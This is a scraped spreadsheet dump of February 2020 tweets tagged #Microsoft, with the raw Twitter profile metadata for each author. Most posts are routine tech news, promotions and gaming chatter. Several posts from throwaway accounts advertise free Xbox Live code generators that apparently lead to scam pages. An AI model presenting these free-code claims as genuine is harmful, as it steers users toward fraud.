    <t>{'id': 4865463921, 'id_str': '4865463921', 'name': 'News Observatory', 'screen_name': 'NewsObservatory', 'location': 'Worldwide', 'description': 'News Observatory | Breaking News source | Real-time coverage of the world events, politics, markets, finance, conflict zones | @NewsObservatory', 'url': 'https://t.co/04kPtXPGUd', 'entities': {'url': {'urls': [{'url': 'https://t.co/04kPtXPGUd', 'expanded_url': 'http://newsobservatory.com', 'display_url': 'newsobservatory.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 14966, 'friends_count': 888, 'listed_count': 85, 'created_at': 'Sat Jan 30 23:56:59 +0000 2016', 'favourites_count': 844, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 77325,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'http://pbs.twimg.com/profile_images/1165330985996738563/o__bz8Yi_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1165330985996738563/o__bz8Yi_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4865463921/1566671533',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</si>
  <si>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Sat Feb 29 15:36:30 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft to remove Cortana from Android launcher in April - Window To News https://t.co/9eh2pcCKKo
#Microsoft,#Android,#SanFrancisco</t>
  </si>
  <si>
    <t>{'id': 783546511682592768, 'id_str': '783546511682592768', 'name': 'Window To News', 'screen_name': 'windowtonews', 'location': 'Bhopal, India', 'description': 'Window To News brings you the Breaking News &amp; Latest Leads, Articles and Videos on Entertainment, Gossips, Business, Current Affairs ,Emerging Technologies....', 'url': 'https://t.co/M76VgulWMs', 'entities': {'url': {'urls': [{'url': 'https://t.co/M76VgulWMs', 'expanded_url': 'http://windowtonews.com/', 'display_url': 'windowtonews.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 187, 'friends_count': 784, 'listed_count': 4, 'created_at': 'Wed Oct 05 05:57:00 +0000 2016', 'favourites_count': 2201, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 126123,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'http://pbs.twimg.com/profile_images/1002434028807512064/bSxmmSxx_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1002434028807512064/bSxmmSxx_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/783546511682592768/1579330288',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</si>
  <si>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15:33:25 +0000 2020</t>
  </si>
  <si>
    <t>Take a personalized and transparent approach to #healthcare services. Start your patient engagement journey: https://t.co/5nXT5JFUyT https://t.co/UZotRfTMkB #Microsoft</t>
  </si>
  <si>
    <t>Sat Feb 29 15:33:22 +0000 2020</t>
  </si>
  <si>
    <t>What would be (in your own opinion) the most amazing cross-over moment in video game history?
.
.
.
#questionoftheday #youropinion #videogame #xbox #ps4 #ps5 #PS5 #Microsoft #PlayStation #sony #XboxOne #XboxSeriesX #nintendo #nintendoswitch #game #gaming #hoax #crossover</t>
  </si>
  <si>
    <t>Sat Feb 29 15:31:10 +0000 2020</t>
  </si>
  <si>
    <t>This is a very simple way you can get Free Xbox Live Codes here online and it has been always a very simple task for us generating the codes online.https://t.co/Ju5RDVa4aHhttps://t.co/FzPP323dcK #XboxOne #XboxLive #XboxSeriesX #Microsoft #freegame #GiftCard https://t.co/UyGhglPhTk</t>
  </si>
  <si>
    <t>{'id': 1153412289657282560, 'id_str': '1153412289657282560', 'name': 'Free Card Code', 'screen_name': 'FreeCardCode1', 'location': 'United State', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 3, 'friends_count': 4, 'listed_count': 0, 'created_at': 'Mon Jul 22 21:11:33 +0000 2019', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 57, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1153412686346149888/HGyZ1rgL_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1153412686346149888/HGyZ1rgL_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1153412289657282560/1563830092',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</si>
  <si>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15:30:29 +0000 2020</t>
  </si>
  <si>
    <t>#mozilla updates on #firefox #surveillance hosted by/developers on #microsoft servers :-/ https://t.co/qOlcxjSiWo https://t.co/fZK46e4TvH</t>
  </si>
  <si>
    <t>Sat Feb 29 15:30:10 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft has released another #Windows10 cumulative update. It introduces a variety of quality improvements and #BugFixes. Here are the details from BleepingComputer.
https://t.co/d52eM9QGP7
#V2Systems #ITProfessionals
(703) 215-2921 https://t.co/1OcBI2EGiM</t>
  </si>
  <si>
    <t>{'id': 92390244, 'id_str': '92390244', 'name': 'V2 Systems', 'screen_name': 'v2systems', 'location': 'Manassas Park, VA', 'description': '#V2Systems is an @AwardWinning #ITServices #MSP in #NOVA and #DCMetro. #RegulatoryCompliance, #CyberSecurity, #SystemsMaintenance, #CloudComputing, #TechSupport', 'url': 'https://t.co/upJnAP2TfT', 'entities': {'url': {'urls': [{'url': 'https://t.co/upJnAP2TfT', 'expanded_url': 'https://v2systems.com/', 'display_url': 'v2systems.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 70, 'friends_count': 128, 'listed_count': 3, 'created_at': 'Tue Nov 24 23:03:49 +0000 2009', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1197,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'http://pbs.twimg.com/profile_images/979801390598914048/z0ncgEDv_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/979801390598914048/z0ncgEDv_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/92390244/1533212703', 'profile_link_color': 'FF691F', 'profile_sidebar_border_color': 'C0DEED', 'profile_sidebar_fill_color': 'DDEEF6', 'profile_text_color': '333333', 'profile_use_background_image': False, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>#Microsoft drops #Cortana consumer skills in new #Windows10 update https://t.co/7cG1berXNt</t>
  </si>
  <si>
    <t>{'id': 37453039, 'id_str': '37453039', 'name': 'Michelle Victor', 'screen_name': 'michvictor', 'location': 'Washington, DC', 'description': '@USMC Veteran ~ Fortune Ones to Watch: Tech âˆ†* ~ #LiveVictoriously ~ Johns Hopkins Grad School Alumna, Doing Innovative Digital @boozallen [Tweets are my ownðŸ˜Š]', 'url': 'https://t.co/yxNxQ9aU3Q', 'entities': {'url': {'urls': [{'url': 'https://t.co/yxNxQ9aU3Q', 'expanded_url': 'http://www.linkedin.com/in/michvictor', 'display_url': 'linkedin.com/in/michvictor', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1792, 'friends_count': 3539, 'listed_count': 132, 'created_at': 'Sun May 03 17:01:41 +0000 2009', 'favourites_count': 6570, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5602,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'http://pbs.twimg.com/profile_images/1070742020732452864/fdLObGcp_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1070742020732452864/fdLObGcp_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/37453039/1419090181',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</si>
  <si>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15:27:15 +0000 2020</t>
  </si>
  <si>
    <t>#Azure Exam AZ-500! Three courses have been recorded and are being processed, I am currently working on the fourth and last course of this series! Stay tuned, the learning path to the AZ-500 will soon be on @LI_Learning_DE!
#microsoft #azuresecurity #microsoftazure #certs</t>
  </si>
  <si>
    <t>Sat Feb 29 15:26:41 +0000 2020</t>
  </si>
  <si>
    <t>Get free xbox code and redeem Free Xbox Live Gold Codes in 2020. We explain everything in short terms to jump into Xbox database of codes.https://t.co/mMQvwEtIE4https://t.co/hbplNWgOTk #Xbox #XboxSeriesX #XboxGamePass #Microsoft #GiftCard #freegame #March2020 https://t.co/lqJ3AXwZBf</t>
  </si>
  <si>
    <t>{'id': 1153406928451788801, 'id_str': '1153406928451788801', 'name': 'Free Code Card', 'screen_name': 'FreeCodeCard1', 'location': 'United States', 'description': 'xbox one free codes / xbox reddem codes free', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2, 'friends_count': 4, 'listed_count': 0, 'created_at': 'Mon Jul 22 20:50:15 +0000 2019', 'favourites_count': 1,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'http://pbs.twimg.com/profile_images/1153407604581982208/guhF30vh_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1153407604581982208/guhF30vh_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1153406928451788801/1563828798',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</si>
  <si>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15:25:48 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Exchange - Export Mailbox Sizes to Excel - https://t.co/UL3pKZ1eWz #Guide #IT #techblogger #mblogger #techygeekshome https://t.co/EweNwfRt9P</t>
  </si>
  <si>
    <t>Sat Feb 29 15:25:07 +0000 2020</t>
  </si>
  <si>
    <t>Why is Satya na-DELL-a?
because Satya is
Microsoft's CEO
#SatyaNadella #Microsoft #Dell https://t.co/Ju01Lm4Yoa</t>
  </si>
  <si>
    <t>{'id': 27205510, 'id_str': '27205510', 'name': 'majid', 'screen_name': 'kaapiccino', 'location': 'India', 'description': 'Master By Accident', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 320, 'friends_count': 270, 'listed_count': 11, 'created_at': 'Sat Mar 28 09:48:53 +0000 2009', 'favourites_count': 2123, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3439, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '75A0CB', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/762999188455985153/yYrqeSaH_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/762999188455985153/yYrqeSaH_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/27205510/1573145571', 'profile_link_color': '75A0CB', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': '000000', 'profile_text_color': '3573B1', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Sat Feb 29 15:22:21 +0000 2020</t>
  </si>
  <si>
    <t>Does anyone know a bulletproof solution for the headline enumeration problem in #Word? All "headline 4" start with 1.1.1. and continue numbering across the whole document  #microsoft #Office365</t>
  </si>
  <si>
    <t>{'id': 16448964, 'id_str': '16448964', 'name': 'Paul Lanzerstorfer', 'screen_name': 'Lanzelot13', 'location': 'Linz, Austria', 'description': 'Loving father and husband ðŸ’• passionate online marketer ðŸ‘¨\u200dðŸ’» speaker ðŸŽ¤ CEO of @pulpmedia ðŸ¤˜Account is business &amp; private, english &amp; german, personal opinions.', 'url': 'https://t.co/ZE6IttVCyn', 'entities': {'url': {'urls': [{'url': 'https://t.co/ZE6IttVCyn', 'expanded_url': 'http://www.pulpmedia.at', 'display_url': 'pulpmedia.at', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1376, 'friends_count': 964, 'listed_count': 115, 'created_at': 'Thu Sep 25 10:12:12 +0000 2008', 'favourites_count': 7881, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 11329,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'http://pbs.twimg.com/profile_images/1215722348323786752/WVIl7zgv_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1215722348323786752/WVIl7zgv_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/16448964/1433327963',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</si>
  <si>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15:21:46 +0000 2020</t>
  </si>
  <si>
    <t>End of windows7...
Just click the link to know about it...
https://t.co/iDCwTbvG0d
#Windows7 #end #Windows10 #upgrade #google #microsoft #iOS #Download #link #linkinbio #Android #vacancies #sharmilan #coronavirus #fantasy #apple #win7 #WIN #win10 #Windows #os #lin</t>
  </si>
  <si>
    <t>{'id': 914724078673584128, 'id_str': '914724078673584128', 'name': 'Sharmilan Vipo', 'screen_name': 'Sharmilan_vipo', 'location': 'Chennai, India', 'description': 'Positive minded..â£ï¸\nyoutuber...â£ï¸\nstudent at Loyola College..â£ï¸', 'url': 'https://t.co/zLZ9NYpkUl', 'entities': {'url': {'urls': [{'url': 'https://t.co/zLZ9NYpkUl', 'expanded_url': 'https://m.youtube.com/channel/UCSMK07bYDcNLmOsiGsjmdTA', 'display_url': 'm.youtube.com/channel/UCSMK0â€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 12, 'friends_count': 103, 'listed_count': 0, 'created_at': 'Mon Oct 02 05:29:50 +0000 2017', 'favourites_count': 24, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False,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'http://pbs.twimg.com/profile_images/1231095046469898246/ZfTDoZPc_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1231095046469898246/ZfTDoZPc_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/914724078673584128/1567849827',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</si>
  <si>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15:21:12 +0000 2020</t>
  </si>
  <si>
    <t>How to Get Unlimited Free Xbox Live Codes (Updated march 2020) ... code xbox freehttps://t.co/tFXrZeNBiHhttps://t.co/Qr7aw1AEhj #Xbox #XboxSeriesX #XboxGamePass #Microsoft #GiftCard #freegame #xboxcodes #XboxLive #March2020 https://t.co/raDStQJx5c</t>
  </si>
  <si>
    <t>{'id': 1153401069352968192, 'id_str': '1153401069352968192', 'name': 'Free Code Cardx', 'screen_name': 'FCardx', 'location': 'United States', 'description': 'free xbox live code / xbox gold free trial', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1, 'friends_count': 6, 'listed_count': 0, 'created_at': 'Mon Jul 22 20:26:58 +0000 2019', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 58, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1153401364653006848/oRyRVLmw_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1153401364653006848/oRyRVLmw_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1153401069352968192/1563827410',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</si>
  <si>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15:19:03 +0000 2020</t>
  </si>
  <si>
    <t>Have you ever wondered who are some of the most important execs at #Microsoft under Satya Nadella? Well here they are: https://t.co/HXohvnZxOi 
#MSPartner #MSUSPartner #IAMCP https://t.co/gL1Bmzkczh</t>
  </si>
  <si>
    <t>{'id': 123912966, 'id_str': '123912966', 'name': 'IAMCP', 'screen_name': 'IAMCPorg', 'location': 'Worldwide', 'description': 'The International Association of Microsoft Channel Partners (IAMCP) represents MicrosoftÂ´s best of breed partners from around the globe.', 'url': 'http://t.co/kEBPHFIkDB', 'entities': {'url': {'urls': [{'url': 'http://t.co/kEBPHFIkDB', 'expanded_url': 'http://www.iamcp.org', 'display_url': 'iamcp.org', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4124, 'friends_count': 4991, 'listed_count': 179, 'created_at': 'Wed Mar 17 16:22:20 +0000 2010', 'favourites_count': 713, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 11190, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '002545', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1150195334255001600/bbNg4wAW_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1150195334255001600/bbNg4wAW_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/123912966/1563063191', 'profile_link_color': '003366', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': '999999', 'profile_text_color': '002545', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Sat Feb 29 15:18:02 +0000 2020</t>
  </si>
  <si>
    <t>Sat Feb 29 15:18:01 +0000 2020</t>
  </si>
  <si>
    <t>TRACK 1
@eiximenis
 Con functions, kubeerneted y a lo loco
#netcoreconf #netcore #Azure #Microsoft #Cloud #Xamarin #net #IA #BigData #IoT #Valencia https://t.co/x8OcNUBWop</t>
  </si>
  <si>
    <t>{'id': 1003191126109638656, 'id_str': '1003191126109638656', 'name': 'netcoreconf', 'screen_name': 'netcoreconf', 'location': '', 'description': 'Comunidad tÃ©cnica para desarrolladores .NET #netcoreconf \nNuestro evento tÃ©cnico mÃ¡s importante #NetCore #Cloud #Xamarin #IA #Data #VisualStudio', 'url': 'https://t.co/F4CgAn1FkQ', 'entities': {'url': {'urls': [{'url': 'https://t.co/F4CgAn1FkQ', 'expanded_url': 'https://netcoreconf.com', 'display_url': 'netcoreconf.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1123, 'friends_count': 443, 'listed_count': 20, 'created_at': 'Sun Jun 03 08:26:17 +0000 2018', 'favourites_count': 2107, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1640,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'http://pbs.twimg.com/profile_images/1029308092738097152/3EyIcA3n_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1029308092738097152/3EyIcA3n_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1003191126109638656/1577610903', 'profile_link_color': '7A197E',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</si>
  <si>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15:16:55 +0000 2020</t>
  </si>
  <si>
    <t>Legal ways to get free unused Xbox Live codes and free xbox game pass ultimate code with no human verification survey offer.https://t.co/0ZaAnH8acjhttps://t.co/nUzYMVdZVJ #Xbox #XboxSeriesX #XboxGamePass #Microsoft #freegame #XboxLive #codegenerator https://t.co/5v94eQTVqA</t>
  </si>
  <si>
    <t>{'id': 1153131985952542721, 'id_str': '1153131985952542721', 'name': 'free xbox codes', 'screen_name': 'freexboxcodes7', 'location': 'United States', 'description': 'xbox redeem codes / xbox live codes free', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 4, 'friends_count': 5, 'listed_count': 0, 'created_at': 'Mon Jul 22 02:37:44 +0000 2019', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 63, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1153132883256778753/AvfCfh9W_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1153132883256778753/AvfCfh9W_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1153131985952542721/1563763323',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</si>
  <si>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15:15:25 +0000 2020</t>
  </si>
  <si>
    <t>Everything you need in order to plan, configure and optimize your SOFS infrastructure, focused primarily on Hyper-V scenarios. #Microsoft #HyperV https://t.co/cz715gvbDR</t>
  </si>
  <si>
    <t>Sat Feb 29 15:09:33 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Edge Chromium now available along with Windows 10 Update https://t.co/wJaoQb5RSR #Microsoft #microsoftedge #chromium #Windows10 #windowsinsiders</t>
  </si>
  <si>
    <t>Sat Feb 29 15:09:05 +0000 2020</t>
  </si>
  <si>
    <t>Want to land a job like "Data Architect / Engineer" at ClearChoice Dental Implant Centers? Applicant tracking systems look for specific keywords. Use the right keywords and get your resume in front of the hiring manager. #Microsoft #GreenwoodVillage, CO</t>
  </si>
  <si>
    <t>{'id': 24481089, 'id_str': '24481089', 'name': 'Denver, CO', 'screen_name': 'tmj_den_itdnet', 'location': 'Denver, CO', 'description': 'Follow this account for geo-targeted Software Dev.  - Microsoft Tools job tweets in Denver, CO. Need help? Tweet us at @CareerArc!', 'url': 'https://t.co/LaEnq08upW', 'entities': {'url': {'urls': [{'url': 'https://t.co/LaEnq08upW', 'expanded_url': 'http://bit.ly/2CYzlhZ', 'display_url': 'bit.ly/2CYzlhZ', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 254, 'friends_count': 163, 'listed_count': 8, 'created_at': 'Sun Mar 15 03:38:16 +0000 2009', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1,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'http://pbs.twimg.com/profile_images/682104577861140480/mCZ26KIn_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/682104577861140480/mCZ26KIn_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/24481089/1451461380',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</si>
  <si>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Sat Feb 29 15:07:33 +0000 2020</t>
  </si>
  <si>
    <t>My Halo collection 
#Xbox #XboxSeriesX #Microsoft #games https://t.co/7Jqd8BteXE</t>
  </si>
  <si>
    <t>{'id': 1112096746119852032, 'id_str': '1112096746119852032', 'name': 'ElvisCardoso23X', 'screen_name': 'elviscardoso23x', 'location': 'Sao Paulo, Brazil', 'description': 'XBOX, PC and Nintendo.\n\nGamerTag Xbox: ElvisCardoso23X\nhttps://t.co/sT7yCNeZqV', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/sT7yCNeZqV', 'expanded_url': 'http://instagram.com/elviscardoso23x', 'display_url': 'instagram.com/elviscardoso23x', 'indices': [55, 78]}]}}, 'protected': False, 'followers_count': 54, 'friends_count': 408, 'listed_count': 0, 'created_at': 'Sat Mar 30 20:58:20 +0000 2019', 'favourites_count': 5890, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False,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'http://pbs.twimg.com/profile_images/1216347532831481856/smYCOkbd_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1216347532831481856/smYCOkbd_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1112096746119852032/1570916374',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</si>
  <si>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15:05:59 +0000 2020</t>
  </si>
  <si>
    <t>Where hybrid cloud is headed next, and the role of Microsoft Azure https://t.co/ZmcVuFDuo3 by @msdynamicsworld #Cloud #Tech #Microsoft #Azure</t>
  </si>
  <si>
    <t>Sat Feb 29 15:02:46 +0000 2020</t>
  </si>
  <si>
    <t>Today's the day  @Maggstor 
@Microsoft x @TotalAdvantageG meet up
If you cant join us at the store make sure to tune into @Maggstor @WatchMixer channel and watch the stream live. 
#mixerstreamer #Microsoft 
https://t.co/Lctk9iWQID</t>
  </si>
  <si>
    <t>Sat Feb 29 15:02:29 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft will make productivity the focus of the digital assistant and as part of the shift, its #digital assistant #Cortana will lose some of its more consumer-facing features, such as the ability to play music and control smart home devices.
https://t.co/8z8okxU70I</t>
  </si>
  <si>
    <t>Sat Feb 29 15:01:56 +0000 2020</t>
  </si>
  <si>
    <t>"Enterprise solutions are big business, and that's where #Microsoft sees its opportunity in #AR" reports this opinionpiece article. https://t.co/FN2oY80hKE</t>
  </si>
  <si>
    <t>{'id': 2305046276, 'id_str': '2305046276', 'name': 'AREA', 'screen_name': 'theAREAorg', 'location': '', 'description': 'Augmented Reality for Enterprise Alliance. Global member-driven organization. Mission: helping enterprises adopt #EnterpriseAR #AR', 'url': 'https://t.co/muCWsOZYSS', 'entities': {'url': {'urls': [{'url': 'https://t.co/muCWsOZYSS', 'expanded_url': 'http://theAREA.org', 'display_url': 'theAREA.org', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 9167, 'friends_count': 6451, 'listed_count': 546, 'created_at': 'Wed Jan 22 15:42:32 +0000 2014', 'favourites_count': 15518, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 17425,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'http://pbs.twimg.com/profile_images/823862408573751296/e3gNL-RD_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/823862408573751296/e3gNL-RD_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2305046276/1485259303',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</si>
  <si>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15:00:41 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft #nonprofit     Teamwork makes the dream work! Download the eBook "7 ways to work smarter in the cloud," brought to you by @msftnonprofits, for tips &amp;amp; tricks so your nonprofit can create, share, &amp;amp; work together wherever you are, on any device. https://t.co/KjEgIBJfQS</t>
  </si>
  <si>
    <t>Sat Feb 29 15:00:40 +0000 2020</t>
  </si>
  <si>
    <t>#EdTech #microsoft     Do your K12 students have the tools they need to be future-ready? Learn more about our affordable Microsoft devices. Contact us to unlock the power of learning.#K12 #MicrosoftEducation #Windows10 https://t.co/vtm588MkZW</t>
  </si>
  <si>
    <t>Sat Feb 29 15:00:06 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft CEO Satya Nadella wants to use diversity to remove bias in AI https://t.co/NEhXmqKD1c</t>
  </si>
  <si>
    <t>Sat Feb 29 15:00:03 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft is opening a new #Azure region in Spain and working with @Telefonica to build out their #AI -powered network to power Industry 4.0! https://t.co/ioGqDHnvrq</t>
  </si>
  <si>
    <t>Sat Feb 29 15:00:00 +0000 2020</t>
  </si>
  <si>
    <t>Read how #Microsoft made @Forbes' Blockchain 50, a list that highlights enterprises embracing #blockchain technology to speed up business processes, increase transparency, and cut costs: https://t.co/jt3mGzx9lx</t>
  </si>
  <si>
    <t>{'id': 870330966908166145, 'id_str': '870330966908166145', 'name': 'MSFTBlockchain', 'screen_name': 'MSFTBlockchain', 'location': '', 'description': 'The official handle for Microsoft Blockchain. Follow to get the latest updates, technical resources and news. #MSFTBlockchain', 'url': 'https://t.co/6nPrJjaK9U', 'entities': {'url': {'urls': [{'url': 'https://t.co/6nPrJjaK9U', 'expanded_url': 'http://aka.ms//MSFTBlockchain', 'display_url': 'aka.ms//MSFTBlockchain', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4677, 'friends_count': 26, 'listed_count': 88, 'created_at': 'Thu Jun 01 17:27:27 +0000 2017', 'favourites_count': 45, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 252, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1044211519590871040/DCoC65yY_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1044211519590871040/DCoC65yY_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/870330966908166145/1537794416',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</si>
  <si>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14:59:34 +0000 2020</t>
  </si>
  <si>
    <t>#Surface Duo: Everything you need to know about #Microsofts dual-screen phone https://t.co/mOoIKLjQeq https://t.co/5BqNGnLIHT</t>
  </si>
  <si>
    <t>Sat Feb 29 14:57:42 +0000 2020</t>
  </si>
  <si>
    <t>Apex Legends  System Override Collection Event Trailer #minecraft #microsoft #bhfyp #photography https://t.co/EtI00BMTQc</t>
  </si>
  <si>
    <t>Sat Feb 29 14:56:47 +0000 2020</t>
  </si>
  <si>
    <t>Put the snow tyres and I'm ready for snow season in Forza Horizon 4. @LandRover Range Rover SVR looking dope in the snow.
#rangerover #svr #XboxOne #PS4 #pcgaming #suv #actuallyplaying #forzahorizon4 #forzamotorsport #forza #Microsoft https://t.co/4bXmZMOfo0</t>
  </si>
  <si>
    <t>{'id': 1231972803118678017, 'id_str': '1231972803118678017', 'name': 'Actually Playing', 'screen_name': 'ActuallyPlaying', 'location': '', 'description': 'I post random gameplay videos/photos of random (mostly racing) games.', 'url': 'https://t.co/6s9SrO1bWR', 'entities': {'url': {'urls': [{'url': 'https://t.co/6s9SrO1bWR', 'expanded_url': 'https://m.youtube.com/channel/UCNINMedFiTYxriP4O7OzNYg', 'display_url': 'm.youtube.com/channel/UCNINMâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1, 'friends_count': 1, 'listed_count': 0, 'created_at': 'Mon Feb 24 16:03:09 +0000 2020', 'favourites_count': 4,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'http://pbs.twimg.com/profile_images/1231973006894723072/6G46RkJ-_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1231973006894723072/6G46RkJ-_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1231972803118678017/1582588579',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</si>
  <si>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14:56:42 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft edge and chrome and feedback and ad and google 
 and youtube and playback and audio and service and server 
 bad so much and down and bad response and have issues</t>
  </si>
  <si>
    <t>Sat Feb 29 14:56:34 +0000 2020</t>
  </si>
  <si>
    <t>How to Stop Automatic Driver Updates That OEM's Can Now Push Through Windows Updates - https://t.co/wCb3BLziR0
